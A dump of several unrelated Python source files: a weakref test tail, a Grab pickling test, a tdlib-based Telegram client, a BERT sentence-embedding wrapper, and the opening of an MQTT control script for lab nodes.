>>> r = weakref.ref(obj)
>>> print(r() is obj)
True
>>> import weakref
>>> class Object:
... pass
...
>>> o = Object()
>>> r = weakref.ref(o)
>>> o2 = r()
>>> o is o2
True
>>> del o, o2
>>> print(r())
None
>>> import weakref
>>> class ExtendedRef(weakref.ref):
... def __init__(self, ob, callback=None, **annotations):
... super().__init__(ob, callback)
... self.__counter = 0
... for k, v in annotations.items():
... setattr(self, k, v)
... def __call__(self):
... '''Return a pair containing the referent and the number of
... times the reference has been called.
... '''
... ob = super().__call__()
... if ob is not None:
... self.__counter += 1
... ob = (ob, self.__counter)
... return ob
...
>>> class A: # not in docs from here, just testing the ExtendedRef
... pass
...
>>> a = A()
>>> r = ExtendedRef(a, foo=1, bar="baz")
>>> r.foo
1
>>> r.bar
'baz'
>>> r()[1]
1
>>> r()[1]
2
>>> r()[0] is a
True
>>> import weakref
>>> _id2obj_dict = weakref.WeakValueDictionary()
>>> def remember(obj):
... oid = id(obj)
... _id2obj_dict[oid] = obj
... return oid
...
>>> def id2obj(oid):
... return _id2obj_dict[oid]
...
>>> a = A() # from here, just testing
>>> a_id = remember(a)
>>> id2obj(a_id) is a
True
>>> del a
>>> try:
... id2obj(a_id)
... except KeyError:
... print('OK')
... else:
... print('WeakValueDictionary error')
OK
"""
__test__ = {'libreftest' : libreftest}
def test_main():
    """Run all unittest suites; the doctest pass is disabled pending
    RustPython doctest support."""
    support.run_unittest(
        ReferencesTestCase,
        WeakMethodTestCase,
        MappingTestCase,
        WeakValueDictionaryTestCase,
        WeakKeyDictionaryTestCase,
        SubclassableWeakrefTestCase,
        FinalizeTestCase,
    )
    # TODO: RUSTPYTHON
    # support.run_doctest(sys.modules[__name__])

if __name__ == "__main__":
    test_main()
|
grab_pickle.py | # coding: utf-8
try:
import cPickle as pickle
except ImportError:
import pickle
from multiprocessing import Queue
from test.util import BaseGrabTestCase, exclude_transport
from test.util import build_grab
class TestGrab(BaseGrabTestCase):
    """Pickling round-trip tests for Grab instances."""

    def setUp(self):
        # Fresh mock-server state before every test.
        self.server.reset()

    @exclude_transport('urllib3')
    def test_pickling(self):
        """
        Test that Grab instance could be pickled and unpickled.
        """
        g = build_grab()
        self.server.response['get.data'] =\
            '<form><textarea name="text">the cat</textarea></form>'
        g.go(self.server.get_url())
        g.set_input('text', 'foobar')
        data = pickle.dumps(g, pickle.HIGHEST_PROTOCOL)
        def func(pickled_grab, resultq):
            # Unpickle and report the parsed textarea text via the queue,
            # so this could also run in a child process (see commented code).
            g2 = pickle.loads(pickled_grab)
            text = g2.doc.select('//textarea').text()
            resultq.put(text)
        result_queue = Queue()
        # p = Process(target=func, args=[data, result_queue])
        # p.start()
        func(data, result_queue)
        text = result_queue.get(block=True, timeout=1)
        self.assertEqual(text, 'the cat')
|
client.py | import os
import hashlib
import time
import queue
import signal
import typing
import getpass
import logging
import base64
import threading
from typing import Any, Dict, List, Type, Callable, Optional, DefaultDict, Tuple, Union
from types import FrameType
from collections import defaultdict
from python_telegram import VERSION
from python_telegram.utils import AsyncResult
from python_telegram.tdjson import TDJson
from python_telegram.worker import BaseWorker, SimpleWorker
logger = logging.getLogger(__name__)

# tdlib update type that message handlers are registered for.
MESSAGE_HANDLER_TYPE: str = 'updateNewMessage'
class Telegram:
    """High-level tdlib client.

    Owns the tdjson binding, a daemon listener thread that receives tdlib
    updates, and a worker that executes user-registered update handlers.
    """

    def __init__(
        self,
        api_id: int,
        api_hash: str,
        database_encryption_key: Union[str, bytes],
        phone: Optional[str] = None,
        bot_token: Optional[str] = None,
        library_path: Optional[str] = None,
        worker: Optional[Type[BaseWorker]] = None,
        files_directory: Optional[str] = None,
        use_test_dc: bool = False,
        use_message_database: bool = True,
        device_model: str = 'python-telegram',
        application_version: str = VERSION,
        system_version: str = 'unknown',
        system_language_code: str = 'en',
        login: bool = False,
        default_workers_queue_size: int = 1000,
        tdlib_verbosity: int = 2,
        proxy_server: str = '',
        proxy_port: int = 0,
        proxy_type: Optional[Dict[str, str]] = None,
        use_secret_chats: bool = True,
    ) -> None:
        """
        Args:
            api_id - ID of your app (https://my.telegram.org/apps/)
            api_hash - api_hash of your app (https://my.telegram.org/apps/)
            phone - your phone number
            bot_token - bot token; alternative to phone for bot accounts
            library_path - you can change path to the compiled libtdjson library
            worker - worker to process updates
            files_directory - directory for the tdlib's files (database, images, etc.)
            use_test_dc - use test datacenter
            use_message_database
            use_secret_chats
            device_model
            application_version
            system_version
            system_language_code
            login - if True, run the blocking login() flow immediately
            default_workers_queue_size - max updates queued for the worker
            tdlib_verbosity - tdlib log verbosity level
            proxy_server / proxy_port / proxy_type - optional proxy settings
        """
        self.api_id = api_id
        self.api_hash = api_hash
        self.library_path = library_path
        self.phone = phone
        self.bot_token = bot_token
        self.use_test_dc = use_test_dc
        self.device_model = device_model
        self.system_version = system_version
        self.system_language_code = system_language_code
        self.application_version = application_version
        self.use_message_database = use_message_database
        self._queue_put_timeout = 10
        self.proxy_server = proxy_server
        self.proxy_port = proxy_port
        self.proxy_type = proxy_type
        self.use_secret_chats = use_secret_chats

        if not self.bot_token and not self.phone:
            raise ValueError('You must provide bot_token or phone')

        self._database_encryption_key = database_encryption_key

        if not files_directory:
            # Derive a stable per-account directory from the phone/token.
            # md5 is used only as a path hash here, not for security.
            hasher = hashlib.md5()
            str_to_encode: str = self.phone or self.bot_token  # type: ignore
            hasher.update(str_to_encode.encode('utf-8'))
            directory_name = hasher.hexdigest()
            files_directory = f'/tmp/.tdlib_files/{directory_name}/'
        self.files_directory = files_directory

        self._authorized = False
        self._is_enabled = False

        # todo: move to worker
        self._workers_queue: queue.Queue = queue.Queue(
            maxsize=default_workers_queue_size
        )

        if not worker:
            worker = SimpleWorker
        self.worker = worker(queue=self._workers_queue)

        # request_id -> pending AsyncResult awaiting its update.
        self._results: Dict[str, AsyncResult] = {}
        # update @type -> list of user callbacks.
        self._update_handlers: DefaultDict[str, List[Callable]] = defaultdict(list)

        self._tdjson = TDJson(library_path=library_path, verbosity=tdlib_verbosity)
        # Starts the listener thread and the handler worker immediately.
        self._run()

        if login:
            self.login()
def __del__(self) -> None:
    # Best-effort shutdown when the client is garbage collected.
    self.stop()

def stop(self) -> None:
    """Stops the client"""
    self._is_enabled = False
    # Guard against a partially constructed instance (__init__ may have
    # raised before the tdjson wrapper was created).
    if not hasattr(self, '_tdjson'):
        return
    self._tdjson.stop()
def send_message(self, chat_id: int, text: str) -> AsyncResult:
    """
    Sends a message to a chat. The chat must be in the tdlib's database.
    If there is no chat in the DB, tdlib returns an error.
    Chat is being saved to the database when the client receives a message or when you call the `get_chats` method.

    Args:
        chat_id
        text

    Returns:
        AsyncResult whose update will look like:
        {'@type': 'message', 'id': 1, 'sender_user_id': 2, 'chat_id': 3, ...}
    """
    content = {
        '@type': 'inputMessageText',
        'text': {'@type': 'formattedText', 'text': text},
    }
    return self._send_data(
        {
            '@type': 'sendMessage',
            'chat_id': chat_id,
            'input_message_content': content,
        }
    )

def get_chat(self, chat_id: int) -> AsyncResult:
    """
    This is offline request, if there is no chat in your database it will not be found
    tdlib saves chat to the database when it receives a new message or when you call `get_chats` method.
    """
    return self._send_data({'@type': 'getChat', 'chat_id': chat_id})

def get_me(self) -> AsyncResult:
    """
    Requests information of the current user (getMe method)

    https://core.telegram.org/tdlib/docs/classtd_1_1td__api_1_1get_me.html
    """
    return self.call_method('getMe')

def get_user(self, user_id: int) -> AsyncResult:
    """
    Requests information about a user with id = user_id.

    https://core.telegram.org/tdlib/docs/classtd_1_1td__api_1_1get_user.html
    """
    return self.call_method('getUser', params={'user_id': user_id})

def get_chats(
    self, offset_order: int = 0, offset_chat_id: int = 0, limit: int = 100
) -> AsyncResult:
    """
    Returns a list of chats:

    Returns:
        {
            '@type': 'chats',
            'chat_ids': [...],
            '@extra': {'request_id': '...'}
        }
    """
    return self._send_data(
        {
            '@type': 'getChats',
            'offset_order': offset_order,
            'offset_chat_id': offset_chat_id,
            'limit': limit,
        }
    )
def get_chat_history(
    self,
    chat_id: int,
    limit: int = 1000,
    from_message_id: int = 0,
    offset: int = 0,
    only_local: bool = False,
) -> AsyncResult:
    """
    Returns history of a chat

    Args:
        chat_id
        limit
        from_message_id
        offset
        only_local
    """
    return self._send_data(
        {
            '@type': 'getChatHistory',
            'chat_id': chat_id,
            'limit': limit,
            'from_message_id': from_message_id,
            'offset': offset,
            'only_local': only_local,
        }
    )

def get_message(self, chat_id: int, message_id: int) -> AsyncResult:
    """
    Return a message via its message_id

    Args:
        chat_id
        message_id

    Returns:
        AsyncResult whose update will look like:
        {'@type': 'message', 'id': 1, 'sender_user_id': 2, 'chat_id': 3,
         'content': {...}, ...}
    """
    return self._send_data(
        {
            '@type': 'getMessage',
            'chat_id': chat_id,
            'message_id': message_id,
        }
    )

def delete_messages(
    self, chat_id: int, message_ids: List[int], revoke: bool = True
) -> AsyncResult:
    """
    Delete a list of messages in a chat

    Args:
        chat_id
        message_ids
        revoke
    """
    payload = {
        '@type': 'deleteMessages',
        'chat_id': chat_id,
        'message_ids': message_ids,
        'revoke': revoke,
    }
    return self._send_data(payload)

def get_supergroup_full_info(self, supergroup_id: int) -> AsyncResult:
    """
    Get the full info of a supergroup

    Args:
        supergroup_id
    """
    payload = {'@type': 'getSupergroupFullInfo', 'supergroup_id': supergroup_id}
    return self._send_data(payload)

def create_basic_group_chat(self, basic_group_id: int) -> AsyncResult:
    """
    Create a chat from a basic group

    Args:
        basic_group_id
    """
    payload = {'@type': 'createBasicGroupChat', 'basic_group_id': basic_group_id}
    return self._send_data(payload)

def get_web_page_instant_view(
    self, url: str, force_full: bool = False
) -> AsyncResult:
    """
    Use this method to request instant preview of a webpage.
    Returns error with 404 if there is no preview for this webpage.

    Args:
        url: URL of a webpage
        force_full: If true, the full instant view for the web page will be returned
    """
    return self._send_data(
        {'@type': 'getWebPageInstantView', 'url': url, 'force_full': force_full}
    )
def call_method(
    self,
    method_name: str,
    params: Optional[Dict[str, Any]] = None,
    block: bool = False,
) -> AsyncResult:
    """
    Use this method to call any other method of the tdlib

    Args:
        method_name: Name of the method
        params: parameters (may override '@type', matching dict.update semantics)
        block: if True, wait synchronously for the result
    """
    # Later keys win, so entries in `params` override the base '@type',
    # exactly as the original update() call did.
    data = {'@type': method_name, **(params or {})}
    return self._send_data(data, block=block)
def _run(self) -> None:
    # Start receiving tdlib updates in a daemon thread, then start the
    # worker that executes user handlers.
    self._is_enabled = True

    self._td_listener = threading.Thread(target=self._listen_to_td)
    self._td_listener.daemon = True
    self._td_listener.start()

    self.worker.run()

def _listen_to_td(self) -> None:
    # Receive loop: each update is first matched against pending requests
    # (AsyncResult) and then dispatched to user handlers.
    logger.info('[Telegram.td_listener] started')

    while self._is_enabled:
        update = self._tdjson.receive()

        if update:
            self._update_async_result(update)
            self._run_handlers(update)
def _update_async_result(
    self, update: Dict[Any, Any]
) -> typing.Optional[AsyncResult]:
    """Match an incoming tdlib update to its pending AsyncResult.

    Returns the matched AsyncResult, or None when the update carries no
    known request_id. Once a result is complete it is removed from the
    pending-results registry.
    """
    async_result = None

    # for authorizationProcess @extra.request_id doesn't work
    _special_types = (
        'updateAuthorizationState',
    )

    if update.get('@type') in _special_types:
        request_id = update['@type']
    else:
        request_id = update.get('@extra', {}).get('request_id')

    if not request_id:
        logger.debug('request_id has not been found in the update')
    else:
        async_result = self._results.get(request_id)

    if not async_result:
        # Log message grammar fixed ("found in by" -> "found by").
        logger.debug(
            'async_result has not been found by request_id=%s', request_id
        )
    else:
        done = async_result.parse_update(update)
        if done:
            self._results.pop(request_id, None)

    return async_result
def _run_handlers(self, update: Dict[Any, Any]) -> None:
update_type: str = update.get('@type', 'unknown')
for handler in self._update_handlers[update_type]:
self._workers_queue.put((handler, update), timeout=self._queue_put_timeout)
def remove_update_handler(self, handler_type: str, func: Callable) -> None:
"""
Remove a handler with the specified type
"""
try:
self._update_handlers[handler_type].remove(func)
except (ValueError, KeyError):
# not in the list
pass
def add_message_handler(self, func: Callable) -> None:
self.add_update_handler(MESSAGE_HANDLER_TYPE, func)
def add_update_handler(self, handler_type: str, func: Callable) -> None:
if func not in self._update_handlers[handler_type]:
self._update_handlers[handler_type].append(func)
def _send_data(
    self,
    data: Dict[Any, Any],
    result_id: Optional[str] = None,
    block: bool = False,
) -> AsyncResult:
    """
    Sends data to tdlib.

    If `block` is True, waits for the result.
    """
    if '@extra' not in data:
        data['@extra'] = {}

    # A request_id already present in the payload wins unless the caller
    # supplied an explicit result_id.
    if not result_id and 'request_id' in data['@extra']:
        result_id = data['@extra']['request_id']

    async_result = AsyncResult(client=self, result_id=result_id)
    data['@extra']['request_id'] = async_result.id

    # Register the pending result *before* sending so the listener thread
    # cannot receive the reply first and fail to find it.
    self._results[async_result.id] = async_result
    self._tdjson.send(data)
    async_result.request = data

    if block:
        async_result.wait(raise_exc=True)

    return async_result
def idle(
    self, stop_signals: Tuple = (signal.SIGINT, signal.SIGTERM, signal.SIGABRT)
) -> None:
    """Blocks until one of the signals are received and stops"""
    for sig in stop_signals:
        signal.signal(sig, self._signal_handler)

    self._is_enabled = True

    # Polling keeps the main thread responsive to the signal handler.
    while self._is_enabled:
        time.sleep(0.1)

def _signal_handler(self, signum: int, frame: Optional[FrameType]) -> None:
    # Annotated Optional: Python may invoke signal handlers with frame=None.
    self._is_enabled = False
def get_authorization_state(self) -> AsyncResult:
    # Fixed result_id lets login() distinguish this reply from the regular
    # updateAuthorizationState stream.
    logger.debug('Getting authorization state')
    data = {'@type': 'getAuthorizationState'}
    return self._send_data(data, result_id='getAuthorizationState')

def login(self) -> None:
    """
    Login process (blocking)

    Must be called before any other call.
    It sends initial params to the tdlib, sets database encryption key, etc.

    Raises:
        RuntimeError: if a login step returned no update.
        KeyError: on an authorization state this client does not handle.
    """
    if self.proxy_server:
        self._send_add_proxy()

    authorization_state = None
    # State machine: each tdlib authorization state maps to the action that
    # advances it; the None key bootstraps by querying the current state.
    actions = {
        None: self.get_authorization_state,
        'authorizationStateWaitTdlibParameters': self._set_initial_params,
        'authorizationStateWaitEncryptionKey': self._send_encryption_key,
        'authorizationStateWaitPhoneNumber': self._send_phone_number_or_bot_token,
        'authorizationStateWaitCode': self._send_telegram_code,
        'authorizationStateWaitPassword': self._send_password,
        'authorizationStateReady': self._complete_authorization,
    }

    if self.phone:
        logger.info('[login] Login process has been started with phone')
    else:
        logger.info('[login] Login process has been started with bot token')

    while not self._authorized:
        logger.info('[login] current authorization state: %s', authorization_state)
        result = actions[authorization_state]()

        # _complete_authorization returns None; every other action returns
        # an AsyncResult to wait on before reading the next state.
        if result:
            result.wait(raise_exc=True)
            if result.update is None:
                raise RuntimeError('Something wrong, the result update is None')

            if result.id == 'getAuthorizationState':
                authorization_state = result.update['@type']
            else:
                authorization_state = result.update['authorization_state']['@type']
def _set_initial_params(self) -> AsyncResult:
    # First login step: hand tdlib its whole configuration in one
    # setTdlibParameters call.
    logger.info(
        'Setting tdlib initial params: files_dir=%s, test_dc=%s',
        self.files_directory,
        self.use_test_dc,
    )
    data = {
        # todo: params
        '@type': 'setTdlibParameters',
        'parameters': {
            'use_test_dc': self.use_test_dc,
            'api_id': self.api_id,
            'api_hash': self.api_hash,
            'device_model': self.device_model,
            'system_version': self.system_version,
            'application_version': self.application_version,
            'system_language_code': self.system_language_code,
            'database_directory': os.path.join(self.files_directory, 'database'),
            'use_message_database': self.use_message_database,
            'files_directory': os.path.join(self.files_directory, 'files'),
            'use_secret_chats': self.use_secret_chats,
        },
    }
    # result_id ties the reply into the authorization flow in login().
    return self._send_data(data, result_id='updateAuthorizationState')

def _send_encryption_key(self) -> AsyncResult:
    # tdlib expects the local-database key base64-encoded.
    logger.info('Sending encryption key')
    key = self._database_encryption_key
    if isinstance(key, str):
        key = key.encode()
    data = {
        '@type': 'checkDatabaseEncryptionKey',
        'encryption_key': base64.b64encode(key).decode(),
    }
    return self._send_data(data, result_id='updateAuthorizationState')
def _send_phone_number_or_bot_token(self) -> AsyncResult:
    """Sends phone number or a bot_token"""
    if self.phone:
        return self._send_phone_number()
    if self.bot_token:
        return self._send_bot_token()
    raise RuntimeError('Unknown mode: both bot_token and phone are None')

def _send_phone_number(self) -> AsyncResult:
    """Submit the configured phone number to begin code authentication."""
    logger.info('Sending phone number')
    payload = {
        '@type': 'setAuthenticationPhoneNumber',
        'phone_number': self.phone,
        'allow_flash_call': False,
        'is_current_phone_number': True,
    }
    return self._send_data(payload, result_id='updateAuthorizationState')

def _send_add_proxy(self) -> AsyncResult:
    """Tell tdlib to route traffic through the configured proxy."""
    logger.info('Sending addProxy')
    payload = {
        '@type': 'addProxy',
        'server': self.proxy_server,
        'port': self.proxy_port,
        'enable': True,
        'type': self.proxy_type,
    }
    return self._send_data(payload, result_id='setProxy')

def _send_bot_token(self) -> AsyncResult:
    """Authenticate as a bot with the configured token."""
    logger.info('Sending bot token')
    return self._send_data(
        {'@type': 'checkAuthenticationBotToken', 'token': self.bot_token},
        result_id='updateAuthorizationState',
    )

def _send_telegram_code(self) -> AsyncResult:
    """Prompt on stdin for the login code Telegram sent and submit it."""
    logger.info('Sending code')
    code = input('Enter code:')
    return self._send_data(
        {'@type': 'checkAuthenticationCode', 'code': str(code)},
        result_id='updateAuthorizationState',
    )

def _send_password(self) -> AsyncResult:
    """Prompt for the 2FA password (without echo) and submit it."""
    logger.info('Sending password')
    password = getpass.getpass('Password:')
    return self._send_data(
        {'@type': 'checkAuthenticationPassword', 'password': password},
        result_id='updateAuthorizationState',
    )

def _complete_authorization(self) -> None:
    """Mark the login state machine as finished."""
    logger.info('Completing auth process')
    self._authorized = True
|
extract_feature.py | from pysoftNLP.bert.graph import import_tf
from pysoftNLP.bert import modeling
from pysoftNLP.bert import tokenization
from pysoftNLP.bert.graph import optimize_graph
from pysoftNLP.bert import args
from queue import Queue
from threading import Thread
tf = import_tf(0, True)
class InputExample(object):
    """One raw input item: a unique id plus one or two text segments
    (``text_b`` is None for single-sentence inputs)."""

    def __init__(self, unique_id, text_a, text_b):
        self.unique_id, self.text_a, self.text_b = unique_id, text_a, text_b
class InputFeatures(object):
    """A single set of features of data."""

    def __init__(self, unique_id, tokens, input_ids, input_mask, input_type_ids):
        self.unique_id = unique_id
        self.tokens = tokens
        # Parallel lists, all padded to the model's sequence length.
        self.input_ids, self.input_mask, self.input_type_ids = (
            input_ids,
            input_mask,
            input_type_ids,
        )
class BertVector:
    # Wraps a frozen BERT graph behind queue-fed Estimator prediction so
    # callers can request sentence embeddings synchronously via encode().

    def __init__(self, batch_size=32, pooling_strategy="REDUCE_MEAN", max_seq_len=40):
        """
        init BertVector

        :param batch_size: Depending on your memory default is 32
        :param pooling_strategy: one of NONE / REDUCE_MAX / REDUCE_MEAN /
            REDUCE_MEAN_MAX; any other string is passed through unchanged
            (presumably rejected later by optimize_graph -- TODO confirm)
        :param max_seq_len: maximum token count; longer inputs are truncated
        """
        self.max_seq_length = max_seq_len
        self.layer_indexes = args.layer_indexes
        self.gpu_memory_fraction = 1
        if pooling_strategy == "NONE":
            pooling_strategy = args.PoolingStrategy.NONE
        elif pooling_strategy == "REDUCE_MAX":
            pooling_strategy = args.PoolingStrategy.REDUCE_MAX
        elif pooling_strategy == "REDUCE_MEAN":
            pooling_strategy = args.PoolingStrategy.REDUCE_MEAN
        elif pooling_strategy == "REDUCE_MEAN_MAX":
            pooling_strategy = args.PoolingStrategy.REDUCE_MEAN_MAX
        # Freeze/optimize the BERT graph once up-front; inference only.
        self.graph_path = optimize_graph(pooling_strategy=pooling_strategy, max_seq_len=self.max_seq_length)
        self.tokenizer = tokenization.FullTokenizer(vocab_file=args.vocab_file, do_lower_case=True)
        self.batch_size = batch_size
        self.estimator = self.get_estimator()
        # Size-1 queues: encode() is strictly one request at a time.
        self.input_queue = Queue(maxsize=1)
        self.output_queue = Queue(maxsize=1)
        self.predict_thread = Thread(target=self.predict_from_queue, daemon=True)
        self.predict_thread.start()
def get_estimator(self):
    # Build a PREDICT-only Estimator whose model_fn maps the frozen,
    # optimized graph over the incoming feature tensors.
    from tensorflow.python.estimator.estimator import Estimator
    from tensorflow.python.estimator.run_config import RunConfig
    from tensorflow.python.estimator.model_fn import EstimatorSpec

    def model_fn(features, labels, mode, params):
        # Load the serialized graph and wire the feature tensors into its
        # input placeholders; 'final_encodes' holds the pooled embeddings.
        with tf.gfile.GFile(self.graph_path, 'rb') as f:
            graph_def = tf.GraphDef()
            graph_def.ParseFromString(f.read())

        input_names = ['input_ids', 'input_mask', 'input_type_ids']

        output = tf.import_graph_def(graph_def,
                                     input_map={k + ':0': features[k] for k in input_names},
                                     return_elements=['final_encodes:0'])

        return EstimatorSpec(mode=mode, predictions={
            'encodes': output[0]
        })

    config = tf.ConfigProto()
    config.gpu_options.allow_growth = True
    config.gpu_options.per_process_gpu_memory_fraction = self.gpu_memory_fraction
    config.log_device_placement = False
    # Enable XLA JIT compilation for faster inference.
    config.graph_options.optimizer_options.global_jit_level = tf.OptimizerOptions.ON_1

    return Estimator(model_fn=model_fn, config=RunConfig(session_config=config),
                     params={'batch_size': self.batch_size})
def predict_from_queue(self):
    # Daemon-thread body: the estimator blocks on the input queue (inside
    # generate_from_queue) and every prediction batch is published to the
    # output queue for encode() to collect.
    prediction = self.estimator.predict(input_fn=self.queue_predict_input_fn, yield_single_examples=False)
    for i in prediction:
        self.output_queue.put(i)
def encode(self, sentence):
self.input_queue.put(sentence)
prediction = self.output_queue.get()
return prediction
def queue_predict_input_fn(self):
    # An endless Dataset that pulls one feature batch from the input queue
    # per iteration of the generator below.
    return (tf.data.Dataset.from_generator(
        self.generate_from_queue,
        output_types={'unique_ids': tf.int32,
                      'input_ids': tf.int32,
                      'input_mask': tf.int32,
                      'input_type_ids': tf.int32},
        output_shapes={
            'unique_ids': (1,),
            'input_ids': (None, self.max_seq_length),
            'input_mask': (None, self.max_seq_length),
            'input_type_ids': (None, self.max_seq_length)}))

def generate_from_queue(self):
    # Blocks on input_queue.get() (inside convert_examples_to_features),
    # then yields one dict of parallel feature lists per request.
    while True:
        features = list(self.convert_examples_to_features(seq_length=self.max_seq_length, tokenizer=self.tokenizer))
        yield {
            'unique_ids': [f.unique_id for f in features],
            'input_ids': [f.input_ids for f in features],
            'input_mask': [f.input_mask for f in features],
            'input_type_ids': [f.input_type_ids for f in features]
        }
def input_fn_builder(self, features, seq_length):
    """Creates an `input_fn` closure to be passed to Estimator."""
    all_unique_ids = []
    all_input_ids = []
    all_input_mask = []
    all_input_type_ids = []

    # Flatten the InputFeatures into parallel column lists once, up front.
    for feature in features:
        all_unique_ids.append(feature.unique_id)
        all_input_ids.append(feature.input_ids)
        all_input_mask.append(feature.input_mask)
        all_input_type_ids.append(feature.input_type_ids)

    def input_fn(params):
        """The actual input function."""
        batch_size = params["batch_size"]
        num_examples = len(features)

        # This is for demo purposes and does NOT scale to large data sets. We do
        # not use Dataset.from_generator() because that uses tf.py_func which is
        # not TPU compatible. The right way to load data is with TFRecordReader.
        d = tf.data.Dataset.from_tensor_slices({
            "unique_ids":
                tf.constant(all_unique_ids, shape=[num_examples], dtype=tf.int32),
            "input_ids":
                tf.constant(
                    all_input_ids, shape=[num_examples, seq_length],
                    dtype=tf.int32),
            "input_mask":
                tf.constant(
                    all_input_mask,
                    shape=[num_examples, seq_length],
                    dtype=tf.int32),
            "input_type_ids":
                tf.constant(
                    all_input_type_ids,
                    shape=[num_examples, seq_length],
                    dtype=tf.int32),
        })

        d = d.batch(batch_size=batch_size, drop_remainder=False)
        return d

    return input_fn
def model_fn_builder(self, bert_config, init_checkpoint, layer_indexes):
    """Returns `model_fn` closure for TPUEstimator."""

    def model_fn(features, labels, mode, params):  # pylint: disable=unused-argument
        """The `model_fn` for TPUEstimator."""
        unique_ids = features["unique_ids"]
        input_ids = features["input_ids"]
        input_mask = features["input_mask"]
        input_type_ids = features["input_type_ids"]
        jit_scope = tf.contrib.compiler.jit.experimental_jit_scope

        # Run the whole forward pass under XLA JIT compilation.
        with jit_scope():
            model = modeling.BertModel(
                config=bert_config,
                is_training=False,
                input_ids=input_ids,
                input_mask=input_mask,
                token_type_ids=input_type_ids)

            # This builder only serves inference.
            if mode != tf.estimator.ModeKeys.PREDICT:
                raise ValueError("Only PREDICT modes are supported: %s" % (mode))

            tvars = tf.trainable_variables()

            # Initialise BERT weights from the given checkpoint.
            (assignment_map, initialized_variable_names) = modeling.get_assignment_map_from_checkpoint(tvars,
                                                                                                       init_checkpoint)

            tf.logging.info("**** Trainable Variables ****")
            for var in tvars:
                init_string = ""
                if var.name in initialized_variable_names:
                    init_string = ", *INIT_FROM_CKPT*"
                tf.logging.info(" name = %s, shape = %s%s", var.name, var.shape,
                                init_string)

            all_layers = model.get_all_encoder_layers()

            predictions = {
                "unique_id": unique_ids,
            }

            # One output tensor per requested encoder layer.
            for (i, layer_index) in enumerate(layer_indexes):
                predictions["layer_output_%d" % i] = all_layers[layer_index]

            from tensorflow.python.estimator.model_fn import EstimatorSpec

            output_spec = EstimatorSpec(mode=mode, predictions=predictions)
            return output_spec

    return model_fn
def convert_examples_to_features(self, seq_length, tokenizer):
    """Loads a data file into a list of `InputBatch`s.

    Pulls one batch of sentences from ``self.input_queue``, tokenizes each
    one, truncates/pads to ``seq_length`` and yields an ``InputFeatures``
    per example. (The original also filled two local accumulators,
    ``features`` and ``input_masks``, that were never read; they have been
    removed.)
    """
    examples = self._to_example(self.input_queue.get())
    for (ex_index, example) in enumerate(examples):
        tokens_a = tokenizer.tokenize(example.text_a)

        # If the sentence's length is more than seq_length, only use the
        # sentence's left part; two slots are reserved for [CLS] and [SEP].
        if len(tokens_a) > seq_length - 2:
            tokens_a = tokens_a[0:(seq_length - 2)]

        # The convention in BERT for single sequences is:
        #   tokens:   [CLS] the dog is hairy . [SEP]
        #   type_ids:   0    0   0   0   0   0   0
        # "type_ids" distinguish first/second segments; only segment 0 is
        # used here since text_b is never consumed in this path. The [CLS]
        # vector serves as the sentence vector for classification tasks.
        tokens = []
        input_type_ids = []
        tokens.append("[CLS]")
        input_type_ids.append(0)
        for token in tokens_a:
            tokens.append(token)
            input_type_ids.append(0)
        tokens.append("[SEP]")
        input_type_ids.append(0)

        # "input_ids" are the tokens' indices in the vocabulary.
        input_ids = tokenizer.convert_tokens_to_ids(tokens)

        # The mask has 1 for real tokens and 0 for padding tokens. Only
        # real tokens are attended to.
        input_mask = [1] * len(input_ids)

        # Zero-pad up to the sequence length.
        while len(input_ids) < seq_length:
            input_ids.append(0)
            input_mask.append(0)
            input_type_ids.append(0)

        assert len(input_ids) == seq_length
        assert len(input_mask) == seq_length
        assert len(input_type_ids) == seq_length

        # Log the first few examples for debugging.
        if ex_index < 5:
            tf.logging.info("*** Example ***")
            tf.logging.info("unique_id: %s" % (example.unique_id))
            tf.logging.info("tokens: %s" % " ".join(
                [tokenization.printable_text(x) for x in tokens]))
            tf.logging.info("input_ids: %s" % " ".join([str(x) for x in input_ids]))
            tf.logging.info("input_mask: %s" % " ".join([str(x) for x in input_mask]))
            tf.logging.info(
                "input_type_ids: %s" % " ".join([str(x) for x in input_type_ids]))

        yield InputFeatures(
            unique_id=example.unique_id,
            tokens=tokens,
            input_ids=input_ids,
            input_mask=input_mask,
            input_type_ids=input_type_ids)
def _truncate_seq_pair(self, tokens_a, tokens_b, max_length):
"""Truncates a sequence pair in place to the maximum length."""
# This is a simple heuristic which will always truncate the longer sequence
# one token at a time. This makes more sense than truncating an equal percent
# of tokens from each, since if one sequence is very short then each token
# that's truncated likely contains more information than a longer sequence.
while True:
total_length = len(tokens_a) + len(tokens_b)
if total_length <= max_length:
break
if len(tokens_a) > len(tokens_b):
tokens_a.pop()
else:
tokens_b.pop()
@staticmethod
def _to_example(sentences):
    """
    sentences to InputExample

    :param sentences: list of strings
    :return: generator of InputExample

    Note: the original placed this docstring *after* ``import re``, which
    made it a no-op string expression rather than a docstring.
    """
    import re

    unique_id = 0
    for ss in sentences:
        line = tokenization.convert_to_unicode(ss)
        if not line:
            continue
        line = line.strip()
        text_b = None
        # "text_a ||| text_b" yields a sentence pair; otherwise the whole
        # line is a single sentence.
        m = re.match(r"^(.*) \|\|\| (.*)$", line)
        if m is None:
            text_a = line
        else:
            text_a = m.group(1)
            text_b = m.group(2)
        yield InputExample(unique_id=unique_id, text_a=text_a, text_b=text_b)
        unique_id += 1
if __name__ == "__main__":
    import time

    bert = BertVector()
    # Simple interactive loop: embed one typed question per iteration.
    # `start` feeds the commented-out timing line below.
    while True:
        question = input('question: ')
        start = time.time()
        vectors = bert.encode([question])
        print(str(vectors))
        #print(f'predict time:----------{time.time() - start}')
|
manual_control.py | import pickle
import paho.mqtt.client as mqtt
from threading import Thread
import time
import os
import paramiko
import json
# algorithm imports
# Static testbed inventory mapping MEC hostnames to their management IPs;
# 'osboxes-0' is the GUI/controller host (see send_command).
mec_nodes = {'mec-9': '192.168.122.119', 'mec-8': '192.168.122.118', 'mec-7': '192.168.122.117',
             'mec-6': '192.168.122.116', 'mec-5': '192.168.122.115', 'mec-4': '192.168.122.114',
             'mec-3': '192.168.122.113', 'mec-2': '192.168.122.112', 'mec-1': '192.168.122.111',
             'osboxes-0': '192.168.122.110'}
class BrokerCom:
    """Thin MQTT wrapper: subscribes to one topic and records which hosts
    reported completion (messages are pickled ``[hostname, ip]`` pairs)."""

    def __init__(self, user, pw, ip, sub_topic):
        self.user = user
        self.pw = pw
        self.ip = ip
        self.port = 1883
        self.topic = sub_topic
        self.client = mqtt.Client()
        self.finished = set()  # IPs of hosts that reported completion
        self.run = 1           # set to 0 (from another thread) to stop broker_loop

    def on_connect(self, connect_client, userdata, flags, rc):
        print("Connected with Code :" + str(rc))
        # Subscribe Topic from here
        connect_client.subscribe(self.topic)

